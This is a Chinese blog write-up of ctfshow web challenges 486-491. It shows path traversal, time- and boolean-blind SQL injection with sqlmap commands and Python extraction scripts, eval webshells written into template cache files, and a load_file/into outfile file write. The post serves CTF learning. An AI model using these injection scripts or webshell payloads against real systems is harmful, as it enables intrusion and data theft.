ctfshow web入门 中期测评 web486--web491

已于 2024-07-26 14:28:35 修改
阅读量169 收藏
点赞数 3
分类专栏: ctfshow 文章标签: android sql php
于 2024-06-01 10:22:22 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_81040377/article/details/139150456
版权

web486

目录穿越
在这里插入图片描述

在这里插入图片描述
发现这里有file_get_contents函数

action=../flag

拿到flag

web487

action=../index

<?php

include('render/render_class.php');
include('render/db_class.php');

$action=$_GET['action'];
if(!isset($action)){
	header('location:index.php?action=login');
	die();	
}

if($action=='check'){
	$username=$_GET['username'];
	$password=$_GET['password'];
	$sql = "select id from user where username = md5('$username') and password=md5('$password') order by id limit 1";
	$user=db::select_one($sql);
	if($user){
		templateUtil::render('index',array('username'=>$username));
	}else{
		header('location:index.php?action=login');
	}
}

if($action=='login'){
	templateUtil::render($action);
}else{
	templateUtil::render($action);
}

?action=../render/db_class
查看库名是ctfshow

获取select_one方法

public static function select_one($sql){
		$conn = db::getConnection();
		$result=$conn->query($sql);
		if($result){
			return $result->fetch_object();
		}

	}

?action=../render/render_class

<?php
ini_set('display_errors', 'On');
include('file_class.php');
include('cache_class.php');

class templateUtil {
	public static function render($template,$arg=array()){
		if(cache::cache_exists($template)){
			echo cache::get_cache($template);
		}else{
			$templateContent=fileUtil::read('templates/'.$template.'.php');
			$cache=templateUtil::shade($templateContent,$arg);
			cache::create_cache($template,$cache);
			echo $cache;
		}
	}
	public static  function shade($templateContent,$arg){
		foreach ($arg as $key => $value) {
			$templateContent=str_replace('{{'.$key.'}}', $value, $templateContent);
		}
		return $templateContent;
	}

}

?action=../render/cache_class

class cache{
	public static function create_cache($template,$content){
		if(file_exists('cache/'.md5($template).'.php')){
			return true;
		}else{
			fileUtil::write('cache/'.md5($template).'.php',$content);
		}
	}
	public static function get_cache($template){
		return fileUtil::read('cache/'.md5($template).'.php');
	}
	public static function cache_exists($template){
		return file_exists('cache/'.md5($template).'.php');
	}

}

?action=../render/file_class

class fileUtil{

	public static function read($filename){
		return file_get_contents($filename);
	}

	public static function write($filename,$content,$append =0){
		if($append){
			file_put_contents($filename, $content,FILE_APPEND);//追加模式,非覆盖
		}else{
			file_put_contents($filename, $content);
		}
	}
}

代码全部搞出来了

首先action=login->触发render-> 触发create_cache 然后访问cache/md5($template).php进行RCE不对$template不知道是啥我发现,所以只能注入

用’)闭合
猜测username是注入点
(其实password也是)
但是我们用sqlmap是不影响
自动时间盲注,然后找sleep我觉得很强,不用自己找payload写脚本

sqlmap -u "https://647552a8-3fd6-4993-b474-d02971206139.challenge.ctf.show/index.php?action=check&username=1&password=1" --dbs

sqlmap -u "https://cadd53f9-fb40-4b45-81bc-a190f1809a7f.challenge.ctf.show/index.php?action=check&username=1&password=1" -D ctfshow --tables

sqlmap -u "https://cadd53f9-fb40-4b45-81bc-a190f1809a7f.challenge.ctf.show/index.php?action=check&username=1&password=1" -D ctfshow -T flag --dump

测出布尔盲注?action=check&username=0')|| 1=1--+&password=1
在这里插入图片描述
但是貌似网站有问题,ssl认证过不了

import requests

flag = ""
i = 0

while True:
    i += 1
    low = 32
    high = 127

    while low < high:
        mid = (high + low) // 2
        # url = f"https://647552a8-3fd6-4993-b474-d02971206139.challenge.ctf.show/index.php?action=check&username=0')||(if(ascii(substr((database()),{i},1))>{mid},1,0))--+&password=1"
        # url = f"https://647552a8-3fd6-4993-b474-d02971206139.challenge.ctf.show/index.php?action=check&username=0')||(if(ascii(substr((Select(group_concat(schema_name))from(information_schema.schemata)),{i},1))>{mid},1,0))--+&password=1"
        # url = f"https://647552a8-3fd6-4993-b474-d02971206139.challenge.ctf.show/index.php?action=check&username=0')||(if(ascii(substr((SElect(group_concat(table_name))from(information_schema.tables)where(table_schema)='ctfshow'),{i},1))>{mid},1,0))--+&password=1"
        # url = f"https://647552a8-3fd6-4993-b474-d02971206139.challenge.ctf.show/index.php?action=check&username=0')||(if(ascii(substr((SElect(group_concat(column_name))from(information_schema.columns)where(table_name)='flag'),{i},1))>{mid},1,0))--+&password=1"
        url = f"http://647552a8-3fd6-4993-b474-d02971206139.challenge.ctf.show/index.php?action=check&username=0')||(if(ascii(substr((SElect(group_concat(flag))from(ctfshow.flag)),{i},1))>{mid},1,0))--+&password=1"


        r = requests.get(url=url)
        if 'admin' in r.text:
            low = mid + 1
        else:
            high = mid

    if low != 32:
        flag += chr(low)
    else:
        break
    print("\r"+flag,end="")

把https换成http也可以解决

web488

这道题有种代码审计的感觉
action=../index访问源文件

<?php

include('render/render_class.php');
include('render/db_class.php');

$action=$_GET['action'];
if(!isset($action)){
	header('location:index.php?action=login');
	die();	
}

if($action=='check'){
	$username=$_GET['username'];
	$password=$_GET['password'];
	$sql = "select id from user where username = '".md5($username)."' and password='".md5($password)."' order by id limit 1";
	$user=db::select_one($sql);
	if($user){
		templateUtil::render('index',array('username'=>$username));
	}else{
		templateUtil::render('error',array('username'=>$username));
	}
}

if($action=='login'){
	templateUtil::render($action);
}else{
	templateUtil::render($action);
}

看到index可以用上题审计出来的链子了
因为sql语句不成功所以文件名为md5(error).php

写马
action=check&username=<?=eval($_POST[1]);?>&password=1
访问url/cache/cb5e100e5a9a3e7f6d1fd97512215282.php进行rce

web489

<?php

include('render/render_class.php');
include('render/db_class.php');



$action=$_GET['action'];
if(!isset($action)){
	header('location:index.php?action=login');
	die();	
}

if($action=='check'){
	$sql = "select id from user where username = '".md5($username)."' and password='".md5($password)."' order by id limit 1";
	extract($_GET);
	$user=db::select_one($sql);
	if($user){
		templateUtil::render('index',array('username'=>$username));
	}else{
		templateUtil::render('error');
	}
}

if($action=='clear'){
	system('rm -rf cache/*');
	die('cache clear');
}

if($action=='login'){
	templateUtil::render($action);
}else{
	templateUtil::render($action);
}

看了一下就是写不进error了但是可以写index.php 
变量覆盖使得SQL成功进行
action=check&username=<?=eval($_POST[1]);?>&password=1&sql=select 1;

url/cache/6a992d5529f459a44fee58c733255e86.php进行rce

思路就是这样然后发现还有需要clear删除之前的东西

web490

$sql = "select username from user where username = '".$username."' and password='".md5($password)."' order by id limit 1";

sql语句正常了,还是可以写index

action=check&username=-1'union select '<?=eval($_POST[1]);?>'--+&password=1

在这里插入图片描述

action=check&username=-1'union select 'eval($_POST[1]);'--+&password=1

url/cache/6a992d5529f459a44fee58c733255e86.php进行rce

在这里插入图片描述

别忘了clear

web491

$sql = "select username from user where username = '".$username."' and password='".md5($password)."' order by id limit 1";

我们猜测flag在根目录下面,写文件然后访问

action=check&username=1' union select load_file("/flag") into outfile "/tmp/6.php"--+&password=1
action=../../../../../../../tmp/6

sqlmap -u "https://e92dd2f2-c203-4291-bb04-641310b42dcf.challenge.ctf.show/index.php?action=check&username=1&password=1" -D ctfshow -T user --dump

import requests
import time

flag = ''

for i in range(1,250):
    time.sleep(0.04)
    low = 32
    high = 128
    mid = (low+high)//2
    while(low<high):
        payload = "http://e92dd2f2-c203-4291-bb04-641310b42dcf.challenge.ctf.show/index.php?action=check&username=admin' or ascii(substr((select load_file('/flag')),{0},1))>{1}--+&password=1".format(i,mid)
        r = requests.get(payload)#get 方法传数据
        # print(payload)
        # time.sleep(0.04)
        if 'flag' in r.text:#二分法
            low = mid+1
        else:
            high = mid
        mid = (low+high)//2
    if(mid ==32 or mid ==127):
        break
    flag = flag+chr(mid)
    print(flag)
baozongwi
关注
  • 3
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Python开发-评测哪个Web框架是最快的
08-09
本篇文章将深入探讨如何评测Python中的Web框架性能,以及可能影响速度的关键因素。我们将以"The Benchmarker Web Frameworks"项目为参考,该项目提供了对多个流行Python Web框架的基准测试。 首先,我们来了解...
ctf.show中期测评(web486-web516)
wanan的博客
09-03 982
ctf.show中期测评(web486-web516)
ctfshow 中期测评
qq_50589021的博客
09-27 1906
web486——后台扫描 开局假页面,扫描后台 CTF常用字典整理: .index.php.swp index.php.swp index.php.bak .index.php~ index.php.bak_Edietplus index.php.~ index.php.~1~ index.php index.php~ index.php.rar index.php.zip index.php.7z index.php.tar.gz www.zip www.rar www.zip www.7z www.ta
CTFSHOW中期测评486-509(持续更新中)
羽的博客
03-30 1623
web486 扫描后台发现flag.php,根据url发现存在文件包含,templates/xxx.php 所以只需要action=…/flag即可 payload: index.php?action=../flag web487
ctfshow web 488,489(偶尔更新)
weixin_53747083的博客
03-31 3873
记录一下小编花了一个多小时才做出来的一道《入门题》 收获挺多的,记录一下 打开 之后,就是这么个页面,结合前两道题的经验,直接读取index.php,也就是../index if($user){ templateUtil::render('index',array('username'=>$username)); }else{ templateUtil::render('error',array('username'=>$username)); } 这里是
(补)ctfshow中期测评
Npceer-一位网安初学者的博客
09-12 255
懒B来补发一下博客 之前写了存在草稿箱 过几天在发cms审计复现吧web487web488web488(困了 明天补) web487 目录穿越 直接action=1看报错 然后猜action=flag web488 因为是写到后面才补的博客 所以没留下什么 就剩两张图片了 简单的盲注脚本 脚本找不到了 回过头写wp 看看其他大佬的博客 还是能学到很多的 Y4giegie的sql注法 直接外带 ?action=check&username=1') union select flag from fla
评测哪个Web框架是最快的?-python
06-18
评测哪个Web框架是最快的? 哪个最快? 该项目旨在成为一个负载基准测试套件,不多也不少,测量每个框架(中间件)的响应时间(路由时间)。 :warning: :warning: :warning: :warning: :warning: :warning: :...
毕业论文-基于WEB的学生综合测评系统的设计与实现
09-14
本文根据学生综合测评系统的特点,采用 B / S (浏览器/服务器)的系统设计方案。选用 ASP . NET 和 SQL Server 2008开发环境,设计并实现了一个学生综合测评系统。主要工作如下: 首先,本文对系统进行了全面的...
Web测试工具对比--自动化软件测试(1)
03-23
webWebWeb测试工具对比--自动化软件测试(1)软件测试针对xxx(java开发)软件进行测试,对winrunner7.0,RationalRobot,QuickTest进行评测,评测主要包括易用性,扩展性,稳定性等三方面.xxx登陆功能是使用最频繁的功能...
hustoj-souce.zip_WEB开发_PHP_
08-11
【标题】"hustoj-source.zip" 是一个与WEB开发相关的源代码压缩包,主要使用PHP编程语言构建。这个系统设计用于在线评测和测试代码,它利用PHP的特性来实现这一功能。 【描述】提到,该系统是"基于PHP编译而成",这...
Web】CTFSHOW 中期测评刷题记录(1)
uuzeray的博客
05-02 2022
访问./cache/6a992d5529f459a44fee58c733255e86.php,命令执行拿flag。login.php是在./templates下的,而./flag.php与./templates均为web目录。注意到用./template/error.php中存在{{username}},可以用其cache来写马。这时候重开下靶机再去读./templates/index.php,发现是给了提示的。访问./config/settings.php,命令执行拿到flag。
CTFshow web48 49 50 51 52
ChenD的学习笔记
11-10 893
CTFshow web48 web49 web50 web51 web52
ctfshow学习记录-web入门(命令执行69-77&118)
龟速更新的九某人
06-27 978
ctfshow学习记录-web入门(命令执行web69-77&118)
Android 自定义系统版本号
码点
07-22 309
通过查看编译完成后的文件 out/target/product/generic_x86_64/system/build.prop 确认是否修改完成。重新编译,可以直接make,无需清理out文件夹重新花费大量时间全部编译。framework开发,实现自定义系统版本号。
Android DataBinding从入门到精通
Dream的博客
07-22 1111
DataBinding可以更加方便的编写与视图交互的代码。即系统会为模块中的每个xml文件生成一个绑定类,其实例包含指向相应布局中具有ID的所有视图的直接引用。大多数情况下,DataBinding会代替findMyId。
uniapp安卓通过绝对路径获取文件
qq_61950936的博客
07-23 274
请确保你的uniapp应用具有读取存储的权限,并且该文件确实存在于指定的路径。此外,你的应用可能需要运行在Android 4.4及以上版本的设备上,因为plus.io API是基于HTML5 Plus的,而这个特性需要设备的Android版本和浏览器支持。在uniapp中,如果你想要访问安卓设备上的文件,你需要使用uniapp提供的plus.io API。这个API允许你在应用内访问设备的文件系统。
蚂蚁集团Android一面凉经(2024)
最新发布
景三的专栏
07-25 192
笔者作为一名双非二本毕业7年老Android, 最近面试了不少公司, 目前已告一段落, 整理一下各家的面试问题, 打算陆续发布出来, 供有缘人参考。今天给大家带来的是《蚂蚁集团Android一面凉经(2024)》。
Android 通过接收广播int值来控制GPS开关
qq_46687516的博客
07-25 380
Override} else {try {
ctfshow web487
08-28
很抱歉,我无法回答你的问题。因为你引用的内容似乎是一些关于网络安全竞赛(CTF)中的一些代码和脚本,与麦田怪圈的话题无关。如果你有其他关于麦田怪圈的问题,请随时提问。谢谢!<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *2* *3* [ctfshow 中期测评](https://blog.csdn.net/qq_50589021/article/details/120516180)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_1"}}] [.reference_item style="max-width: 100%"] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值